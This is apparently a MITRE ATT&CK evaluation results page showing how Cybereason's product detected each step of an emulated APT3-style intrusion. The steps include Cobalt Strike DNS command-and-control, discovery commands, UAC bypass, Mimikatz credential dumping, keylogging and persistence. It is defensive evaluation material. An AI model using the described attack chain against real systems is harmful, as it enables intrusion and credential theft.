Cybereason

Cybereason Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Legend
Main Detection Categories: None, Telemetry, Indicator of Compromise, General Behavior, Specific Behavior, Enrichment
Detection Modifiers: Tainted, Delayed, Configuration Change

Columns: Step, Procedure, Technique, Detection Type, Detection Notes, Screenshots. The rows are listed below by step.

Step 1.A.1
Procedure: Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

Technique: User Execution (T1204)
  Detection: General Behavior
    A General Behavior alert was generated based on the identification of Resume Viewer.exe as unknown malware by the Anti-Malware engine. Vendor stated that the capability would have prevented the execution of Resume Viewer.exe.
  Detection: General Behavior
    A General Behavior alert was generated based on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
  Detection: Telemetry (Tainted)
    Telemetry showed that Resume Viewer.exe was executed and running as a process. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. The provided screenshot was captured later in the evaluation and includes additional information appended to explorer.exe not relevant to this procedure.
  Screenshots:
    - General Behavior alert identifying Resume Viewer.exe as unknown malware
    - General Behavior alert for explorer.exe executing Resume Viewer.exe, identified as a known malicious file
    - Telemetry showing Resume Viewer.exe running as a process (tainted by parent alert on explorer.exe)

Technique: Rundll32 (T1085)
  Detection: Specific Behavior (Tainted)
    A Specific Behavior alert was generated for rundll32.exe launching a module in a temporary folder and injecting shellcode into a victim process. The alert was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
  Detection: Telemetry (Tainted)
    Telemetry within the rundll32.exe injection alert also showed the full command-line arguments of rundll32.exe executing update.dat. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. For most alerts in the user interface, the telemetry behind the alert is separately available in the capability and counted as a separate detection.
  Detection: Specific Behavior (Tainted)
    A Specific Behavior alert was generated for injected shellcode by a compromised legitimate process (rundll32.exe). The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and a related Technique (Process Injection) and was tainted by a parent alert on the rundll32.exe injection.
  Screenshots:
    - Specific Behavior alert for rundll32.exe launching a module from a temporary folder and injecting shellcode into a victim process (tainted by parent alert on explorer.exe)
    - Telemetry within the rundll32.exe injection alert showing command-line arguments of rundll32.exe running update.dat (tainted by parent alert on explorer.exe)
    - Specific Behavior alert for rundll32.exe, identified as a compromised legitimate process, injecting shellcode into rundll32.exe, tagged with the correct ATT&CK Tactic (Defense Evasion) and a related Technique (Process Injection)

Technique: Scripting (T1064)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe launching pdfhelper.cmd. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
  Screenshots:
    - Telemetry showing cmd.exe launching pdfhelper.cmd (tainted by parent alert on explorer.exe)

Step 1.B.1
Procedure: Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

Technique: Registry Run Keys / Startup Folder (T1060)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe rewriting autoupdate.bat to the user Debbie's Startup folder. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
  Screenshots:
    - Telemetry showing rename file event for autoupdate.bat
    - Process tree showing the cmd.exe associated with the autoupdate.bat file event (tainted by parent alert on explorer.exe)

Step 1.C.1
Procedure: Cobalt Strike: C2 channel established

Technique: Commonly Used Port (T1043)
  Detection: Telemetry
    Telemetry showed port 53 command and control traffic.
  Screenshots:
    - Telemetry showing port 53 command and control traffic

Technique: Data Encoding (T1132)
  Detection: Telemetry (Tainted)
    Telemetry showed base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing rundll32.exe making encoded DNS queries to freegoogleadsenseinfo.com (C2 domain) (tainted by parent Injected Shellcode alert)
    - Process tree showing rundll32.exe making encoded DNS queries to freegoogleadsenseinfo.com (C2 domain) (tainted by parent Injected Shellcode alert)

Technique: Standard Application Layer Protocol (T1071)
  Detection: Telemetry (Tainted)
    Telemetry showed rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 domain) (tainted by parent Injected Shellcode alert)
    - Process tree showing rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 domain) (tainted by parent Injected Shellcode alert)

Step 2.A.1
Procedure: Cobalt Strike: 'ipconfig /all' via cmd

Technique: System Network Configuration Discovery (T1016)
  Detection: Enrichment (Tainted)
    The capability enriched cmd.exe executing ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing ipconfig with command-line arguments.
  Screenshots:
    - Enrichment of ipconfig.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) (tainted by a parent Injected Shellcode alert)
    - Telemetry showing cmd.exe executing ipconfig with command-line arguments

Step 2.A.2
Procedure: Cobalt Strike: 'arp -a' via cmd

Technique: System Network Configuration Discovery (T1016)
  Detection: Telemetry (Tainted)
    Telemetry showed arp.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing arp with command-line arguments
    - Telemetry showing cmd.exe executing arp with command-line arguments
    - Telemetry showing arp.exe executing within the process tree (tainted by a parent Injected Shellcode alert)

Step 2.B.1
Procedure: Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

Technique: System Owner / User Discovery (T1033)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing echo with command-line arguments (tainted by a parent Injected Shellcode alert)

Step 2.C.1
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs

Technique: Process Discovery (T1057)
  Detection: None
    No detection capability demonstrated for this procedure.

Step 2.C.2
Procedure: Cobalt Strike: 'tasklist /v' via cmd

Technique: Process Discovery (T1057)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing tasklist with command-line arguments
    - Telemetry showing tasklist.exe executing within the process tree (tainted by a parent Injected Shellcode alert)

Step 2.D.1
Procedure: Cobalt Strike: 'sc query' via cmd

Technique: System Service Discovery (T1007)
  Detection: Enrichment (Tainted)
    The capability enriched cmd.exe executing sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing sc with command-line arguments.
  Screenshots:
    - Enrichment of sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) (tainted by a parent Injected Shellcode alert)
    - Telemetry showing cmd.exe executing sc with command-line arguments

Step 2.D.2
Procedure: Cobalt Strike: 'net start' via cmd

Technique: System Service Discovery (T1007)
  Detection: Enrichment (Tainted)
    The capability enriched cmd.exe executing net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Screenshots:
    - Enrichment of net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) (tainted by a parent Injected Shellcode alert)
    - Telemetry showing cmd.exe executing net with command-line arguments

Step 2.E.1
Procedure: Cobalt Strike: 'systeminfo' via cmd

Technique: System Information Discovery (T1082)
  Detection: Enrichment (Tainted)
    The capability enriched systeminfo.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing systeminfo with command-line arguments.
  Screenshots:
    - Enrichment of systeminfo.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) (tainted by a parent Injected Shellcode alert)
    - Telemetry showing cmd.exe executing systeminfo

Step 2.E.2
Procedure: Cobalt Strike: 'net config workstation' via cmd

Technique: System Information Discovery (T1082)
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Detection: Enrichment (Tainted)
    The capability enriched net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing net with command-line arguments
    - Enrichment of net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) (tainted by a parent Injected Shellcode alert)

Step 2.F.1
Procedure: Cobalt Strike: 'net localgroup administrators' via cmd

Technique: Permission Groups Discovery (T1069)
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Detection: Enrichment (Tainted)
    The capability enriched net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The data was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing net with command-line arguments
    - Enrichment of net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
    - Process tree showing enriched net.exe executing (tainted by a parent Injected Shellcode alert)

Step 2.F.2
Procedure: Cobalt Strike: 'net localgroup administrators /domain' via cmd

Technique: Permission Groups Discovery (T1069)
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Detection: Enrichment (Tainted)
    The capability enriched net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The data was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing net with command-line arguments
    - Enrichment of net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
    - Process tree showing enriched net.exe executing (tainted by a parent Injected Shellcode alert)

Step 2.F.3
Procedure: Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

Technique: Permission Groups Discovery (T1069)
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Detection: General Behavior (Tainted)
    A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery). The alert was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing cmd.exe executing net with command-line arguments
    - General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
    - Process tree showing alerted net.exe executing (tainted by a parent Injected Shellcode alert)

Step 2.G.1
Procedure: Cobalt Strike: 'net user /domain' via cmd

Technique: Account Discovery (T1087)
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Detection: Enrichment (Tainted)
    The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing net executing with command-line arguments
    - Enrichment of net.exe executing with the correct ATT&CK Tactic (Account Discovery) and Technique (Discovery)
    - Process tree showing enriched net.exe executing with the correct ATT&CK Technique (Account Discovery) (tainted by a parent Injected Shellcode alert)

Step 2.G.2
Procedure: Cobalt Strike: 'net user george /domain' via cmd

Technique: Account Discovery (T1087)
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Detection: Enrichment (Tainted)
    The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing net executing with command-line arguments
    - Enrichment of net.exe executing with the correct ATT&CK Tactic (Account Discovery) and Technique (Discovery)
    - Process tree showing enriched net.exe executing with the correct ATT&CK Technique (Account Discovery) (tainted by a parent Injected Shellcode alert)

Step 2.H.1
Procedure: Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Technique: Query Registry (T1012)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry within a process tree showing reg.exe executing with command-line arguments (tainted by a parent Injected Shellcode alert)
    - Telemetry showing cmd.exe executing reg with command-line arguments

Step 3.A.1
Procedure: Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

Technique: Access Token Manipulation (T1134)
  Detection: None
    No detection capability demonstrated for this procedure, though an alert was generated for malicious code injection into PowerShell. Telemetry also showed that bypassuactoken.x64.dll was loaded.
  Screenshots:
    - Alert for malicious code injection into PowerShell (does not count as a detection)
    - Telemetry showing that bypassuactoken.x64.dll was loaded (does not count as a detection)

Technique: Bypass User Account Control (T1088)
  Detection: Telemetry (Tainted)
    Telemetry showed powershell.exe running at medium integrity as user Debbie, then another instance running later at high integrity as user Debbie. The telemetry was tainted by a parent PowerShell alert.
  Screenshots:
    - Telemetry showing powershell.exe running at medium integrity as user Debbie
    - Telemetry showing powershell.exe running at high integrity as user Debbie (tainted by a parent PowerShell alert)

Step 3.B.1
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs

Technique: Process Discovery (T1057)
  Detection: None
    No detection capability demonstrated for this procedure.

Step 3.C.1
Procedure: Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Technique: Process Injection (T1055)
  Detection: Specific Behavior (Tainted)
    A Specific Behavior alert was generated for process injection from powershell.exe into cmd.exe (Anonymous RWX). The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and Technique (Process Injection). The alert was tainted by a parent PowerShell alert.
  Screenshots:
    - Specific Behavior alert for powershell.exe injecting into cmd.exe
    - Specific Behavior alert for PowerShell injection into cmd.exe mapped to ATT&CK Tactic (Defense Evasion) and Technique (Process Injection) (tainted by a parent PowerShell alert)

Step 4.A.1
Procedure: Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

Technique: Remote System Discovery (T1018)
  Detection: General Behavior (Tainted)
    A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Screenshots:
    - General Behavior alert for net.exe executing as part of a suspicious execution chain
    - Process tree showing alerted net.exe executing (tainted by a parent Injected Shellcode alert)
    - Telemetry showing net.exe executing with command-line arguments

Step 4.A.2
Procedure: Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

Technique: Remote System Discovery (T1018)
  Detection: General Behavior (Tainted)
    A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing net with command-line arguments.
  Screenshots:
    - General Behavior alert for net.exe executing as part of a suspicious execution chain
    - Process tree showing alerted net.exe executing (tainted by a parent Injected Shellcode alert)
    - Telemetry showing net.exe executing with command-line arguments

Step 4.B.1
Procedure: Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

Technique: System Network Configuration Discovery (T1016)
  Detection: Enrichment (Tainted)
    The capability enriched netsh.exe executing with the correct ATT&CK Tactic (Discovery) and a related Technique (Security Software Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing netsh with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Screenshots:
    - Enrichment of netsh.exe executing with the correct ATT&CK Tactic (Discovery) and related Technique (Security Software Discovery) (tainted by a parent Injected Shellcode alert)

Step 4.C.1
Procedure: Cobalt Strike: 'netstat -ano' via cmd

Technique: System Network Connections Discovery (T1049)
  Detection: Enrichment (Tainted)
    The capability enriched netstat.exe executing as Reconnaissance and mapped it to the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing netstat with command-line arguments.
  Screenshots:
    - Enrichment of netstat.exe executing, labeled as Reconnaissance and mapped to the correct ATT&CK Technique (System Network Connections Discovery) (tainted by a parent Injected Shellcode alert)
    - Telemetry showing cmd.exe executing netstat with command-line arguments

Step 5.A.1
Procedure: Cobalt Strike: Built-in Mimikatz credential dump capability executed

Technique: Credential Dumping (T1003)
  Detection: Specific Behavior
    A Specific Behavior alert was generated for svchost.exe loading Mimikatz and accessing lsass (an audited system resource). The alert was also tagged with the correct ATT&CK Tactic (Credential Access) and a related Technique (Process Injection).
  Screenshots:
    - Specific Behavior alert with correct ATT&CK Tactic (Credential Access) and related Technique (Process Injection) with details about svchost.exe accessing lsass

Technique: Process Injection (T1055)
  Detection: Specific Behavior
    A Specific Behavior alert was generated for svchost.exe reflectively loading a malicious executable, identified as Mimikatz, then accessing lsass. The alert was also tagged with the correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation). The powerkatz.dll was also seen loaded as floating executable code.
  Screenshots:
    - Specific Behavior alert with correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation)
    - Data within alert showing loaded powerkatz.dll as floating executable code

Step 5.A.2
Procedure: Cobalt Strike: Built-in hash dump capability executed

Technique: Credential Dumping (T1003)
  Detection: Telemetry (Tainted)
    Telemetry showed svchost.exe injecting into lsass.exe. The telemetry was tainted by the parent "injected (svchost.exe > lsass.exe)" alert. The hashdumpx64.dll was also seen loaded as floating executable code.
  Screenshots:
    - Telemetry showing svchost.exe process injection into lsass.exe (tainted by a parent injection alert)
    - Parent alert for svchost.exe injecting into lsass.exe, labeled as Malicious Code Injection
    - Telemetry within alert showing loaded hashdumpx64.dll as floating executable code

Technique: Process Injection (T1055)
  Detection: Specific Behavior
    A Specific Behavior alert was generated for svchost.exe injection into lsass.exe. The alert was mapped to the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection). The hashdumpx64.dll was also seen loaded as floating executable code.
  Screenshots:
    - Specific Behavior alert for svchost.exe injecting into lsass.exe, labeled as Malicious Code Injection
    - Details of Specific Behavior alert for svchost.exe process injection into lsass.exe with correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection)
    - Data within alert showing loaded hashdumpx64.dll as floating executable code

Step 5.B.1
Procedure: Cobalt Strike: Built-in token theft capability executed to change user context to George

Technique: Access Token Manipulation (T1134)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe associated with both users Debbie and George, indicating a user context change via token manipulation. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious.
  Screenshots:
    - Telemetry within the process tree showing cmd.exe associated with users Debbie and George (tainted by a parent alert on explorer.exe)

Step 6.A.1
Procedure: Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

Technique: Query Registry (T1012)
  Detection: Telemetry (Tainted)
    Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Telemetry showing reg.exe executing with command-line arguments (tainted by a parent Injected Shellcode alert)

Step 6.B.1
Procedure: Cobalt Strike: C2 channel modified

Technique: Commonly Used Port (T1043)
  Detection: Enrichment (Tainted)
    The capability enriched rundll32.exe opening a connection to the C2 server over an "HTTP port" with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry (Tainted)
    Telemetry showed rundll32.exe opening a connection over port 80. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process.
  Screenshots:
    - Enrichment of rundll32.exe making a connection over the "HTTP Port" with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port) (tainted by a parent Injected Shellcode alert)
    - Telemetry showing rundll32.exe opening a connection over port 80 (tainted by a parent Injected Shellcode alert, listed as Owner process)

Technique: Multiband Communication (T1026)
  Detection: Telemetry (Tainted)
    Telemetry showed the same rundll32.exe opening a connection over port 80 while making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process.
  Screenshots:
    - Telemetry showing the same rundll32.exe opening a connection over port 80 while making DNS queries to freegoogleadsenseinfo.com (C2 domain) (tainted by a parent Injected Shellcode alert, listed as Owner process)

Technique: Standard Application Layer Protocol (T1071)
  Detection: Enrichment (Tainted)
    The capability enriched rundll32.exe opening an unusual network connection to the C2 server over port 80 (the "HTTP port"). The data was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol), and also showed the amount of transmitted/received bytes as well as that the winhttp.dll module was loaded (which an analyst could use to determine that HTTP was used). The data was tainted by a parent Injected Shellcode alert.
  Screenshots:
    - Enrichment of rundll32.exe making an unusual network connection over the "HTTP Port" with the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol) (tainted by a parent Injected Shellcode alert)
    - Enrichment of rundll32.exe showing connection over port 80 and the amount of transmitted/received bytes (tainted by a parent Injected Shellcode alert)
    - Enrichment of rundll32.exe showing winhttp.dll module loaded (tainted by a parent Injected Shellcode alert)

Step 6.C.1
Procedure: Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Technique: Remote Desktop Protocol (T1076)
  Detection: Telemetry (Tainted)
    Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) with Remote Interactive Logon Type. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process. Telemetry also showed rdpclip.exe executing on 10.0.0.5 (Conficker).
  Screenshots:
    - Telemetry showing cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) (tainted by a parent Injected Shellcode alert, listed as Owner process)
    - Telemetry showing cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) with Remote Interactive Logon Type
    - Telemetry showing rdpclip.exe executing on 10.0.0.5 (Conficker)

Step 7.A.1
Procedure: Added user Jesse to Conficker (10.0.0.5) through RDP connection

Technique: Create Account (T1136)
  Detection: Telemetry
    Telemetry showed lsass.exe creating a Registry key for user Jesse, indicating that the user is new.
  Screenshots:
    - Telemetry showing lsass.exe creating a Registry key for user Jesse

Technique: Graphical User Interface (T1061)
  Detection: Telemetry
    Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
  Screenshots:
    - Telemetry showing lusrmgr.msc running from mmc.exe

Technique: Account Discovery (T1087)
  Detection: Telemetry
    Telemetry showed mmc.exe, the Microsoft Management Console, executing lusrmgr.msc (Local Users and Groups snap-in), which displays local account information.
  Screenshots:
    - Telemetry showing lusrmgr.msc running from mmc.exe

Step 7.B.1
Procedure: Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

Technique: Remote File Copy (T1105)
  Detection: Telemetry (Tainted)
    Telemetry showed the creation of updater.dll. The telemetry was tainted by a parent alert on cmd.exe (listed as the owner process) generated based on updater.dll being detected as known malware.
  Screenshots:
    - Telemetry showing the file write of updater.dll (tainted by a parent alert on cmd.exe, listed as Owner Process)
    - Parent alert for updater.dll being detected as known malware

Step 7.C.1
Procedure: Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Technique: Scheduled Task (T1053)
  Detection: Enrichment
    The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The data was also mapped to the correct ATT&CK Tactic (Persistence).
  Detection: Telemetry
    Telemetry showed the Resume Viewer Update Checker scheduled task.
  Screenshots:
    - Enrichment of schtasks.exe with the correct ATT&CK Tactic (Persistence)
    - Telemetry showing the Resume Viewer Update Checker scheduled task

Step 8.A.1
Procedure: Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

Technique: File and Directory Discovery (T1083)
  Detection: Enrichment (Tainted)
    The capability enriched cmd.exe executing dir with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Screenshots:
    - Enrichment of cmd.exe executing dir with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery) (tainted by a parent Injected Shellcode alert)

Step 8.A.2
Procedure: Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

Technique: File and Directory Discovery (T1083)
  Detection: Enrichment (Tainted)
    The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert.
  Detection: Telemetry
    Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
  Screenshots:
    - Enrichment of cmd.exe executing tree with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery) (tainted by a parent Injected Shellcode alert)

Step 8.B.1
Procedure: Cobalt Strike: 'ps' (Process status) via Win32 APIs

Technique: Process Discovery (T1057)
  Detection: None
    No detection capability demonstrated for this procedure.

Step 8.C.1
Procedure: Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

Technique: Input Capture (T1056)
  Detection: None
    No detection capability was available, though an alert was generated based on a chain of injections caused by process injection from powershell.exe into cmd.exe and then into explorer.exe. Data within the alert showed the loaded keyloggerx64.dll module, and additional data showed the memory address and size of the module within explorer.exe.
  Screenshots:
    - Alert for Chain of Injections for powershell.exe injecting into cmd.exe (does not count as a detection)
    - Alert for Chain of Injections showing powershell.exe injecting into explorer.exe (does not count as a detection)
    - Alert showing loaded keyloggerx64.dll module (does not count as a detection)
    - Alert showing keyloggerx64.dll module loaded into explorer.exe, including memory address and size (does not count as a detection)

Technique: Application Window Discovery (T1010)
  Detection: None
    No detection capability demonstrated for this procedure.

Step 8.D.1
Procedure: Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Technique: Screen Capture (T1113)
  Detection: None
    No detection capability was available, though an alert was generated based on explorer.exe being flagged for loading a Meterpreter agent. Data within a previous process injection alert showed the loaded screenshotx64.dll module.
  Screenshots:
    - Alert for explorer.exe loading a Meterpreter agent (does not count as a detection)
    - Alert showing loaded screenshotx64.dll module (does not count as a detection)

Technique: Process Injection (T1055)
  Detection: Specific Behavior
    A Specific Behavior alert was generated based on malicious code injection into explorer.exe. The alert was mapped to the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection) and indicated that explorer.exe was hosting injected threads and loading malicious files.
  Screenshots:
    - Specific Behavior alert for process injection into explorer.exe rolled into the chain of injections
    - Specific Behavior alert for malicious code injection into explorer.exe with correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection)

9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure, though telemetry showed a connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445.
Telemetry showing a port 445 connection between Nimda (10.0.1.6) and the source of the file on Conficker (10.0.0.5) (does not count as detection)
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure, though telemetry showed a connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445.
Telemetry showing a port 445 connection between Nimda (10.0.1.6) and the source of the file on Conficker (10.0.0.5) (does not count as detection)
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe executing autoupdate.bat from the Startup folder. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing rundll32.exe executing autoupdate.bat from the Startup folder (tainted by a parent Injected Shellcode alert)
Parent alert for Injected shellcode into rundll32.exe
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry showing rundll32.exe executing update.dat (tainted by a parent Injected Shellcode alert)
Parent alert for Injected shellcode into rundll32.exe
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry (Tainted)
  
 
